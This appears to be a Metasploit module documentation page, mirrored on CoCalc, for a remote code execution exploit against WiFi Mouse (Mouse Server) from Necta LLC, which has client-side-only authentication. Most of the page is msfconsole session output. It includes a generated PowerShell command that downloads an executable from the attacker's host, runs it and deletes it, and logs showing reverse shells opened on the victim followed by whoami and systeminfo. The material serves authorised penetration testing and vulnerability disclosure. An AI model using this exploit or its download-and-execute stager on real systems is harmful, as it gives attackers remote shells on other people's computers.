CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
Views: 1904

Vulnerable Application

The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the authentication is implemented entirely on the client side. By utilizing this vulnerability, it is possible to open a program on the server (cmd.exe in our case) and type commands resulting in an RCE.

Versions 1.8.3.4 (current as of module writing) and before are vulnerable.

Version 1.8.3.4 can be downloaded from https://wifimouse.necta.us/apk/MouseServer.exe at the time of writing.

Version 1.8.3.0 can be downloaded from https://wifimouse.necta.us/apk/MouseServer1.8.3.0.exe

Version 1.8.2.3 can be downloaded from edb or from https://wifimouse.necta.us/apk/MouseServer1.8.2.3.exe

Version 1.7.8.5 can be downloaded from https://wifimouse.necta.us/apk/MouseServerLatest.exe

Targets

Stager

This is Metasploit's cmd stager, it has two flavors which can be changed through the advanced option CMDSTAGER::FLAVOR.

  1. psh_invokewebrequest (default) this one types the command and pulls back the payload nice and fast. You should use it in almost all circumstances.

  2. certutil typing of the payload appears on the user's screen, and is thus unreliable (needs ~3.5min of solitude). If the user types anything or moves the focus to another window, exploit will fail.

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/misc/wifi_mouse_rce

  4. Set rhost and lhost as required.

  5. Do: run

  6. You should get a shell as the user who is running Wifi Mouse (Mouse Server).

Options

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.

LINEMAX

How long each line should be that is sent for processing. While the program seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe. Defaults to 1020.

Scenarios

Wifi Mouse (Mouse Server) 1.8.3.4 on Windows 10 using psh_invokewebrequest Stager

resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/wifi_mouse_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/qGn4ESH
[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\IDcEhcbA.exe http://1.1.1.1:8080/qGn4ESH & %TEMP%\\IDcEhcbA.exe & del %TEMP%\\IDcEhcbA.exe"]
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (146/146 bytes)
[*] 2.2.2.2:1978 - Client 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98) requested /qGn4ESH
[*] 2.2.2.2:1978 - Sending payload to 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50211) at 2022-09-21 16:29:06 -0400
[*] 2.2.2.2:1978 - Server stopped.


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Windows\system32>whoami
whoami
win10prolicense\windows

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299

Wifi Mouse (Mouse Server) 1.8.2.3 on Windows 10 using certutil Stager

resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mouse.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (mouse.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (mouse.rb)> set CMDSTAGER::FLAVOR certutil
CMDSTAGER::FLAVOR => certutil
msf6 exploit(windows/misc/wifi_mouse_rce) > set verbose false
verbose => false
msf6 exploit(windows/misc/wifi_mouse_rce) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:1978 - Opening command prompt
[*] 2.2.2.2:1978 - Typing out payload
[*] 2.2.2.2:1978 - Command Stager progress -   1.01% done (1019/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -   2.02% done (2038/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -   3.03% done (3057/100776 bytes)
...
[*] 2.2.2.2:1978 - Command Stager progress -  98.08% done (98843/100776 bytes)
[*] 2.2.2.2:1978 - Command Stager progress -  99.09% done (99862/100776 bytes)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (100776/100776 bytes)
[*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:50926) at 2022-09-04 15:11:29 -0400


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Program Files (x86)\MouseServer.exe>whoami
whoami
win10prolicense\windows

C:\Program Files (x86)\MouseServer.exe>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299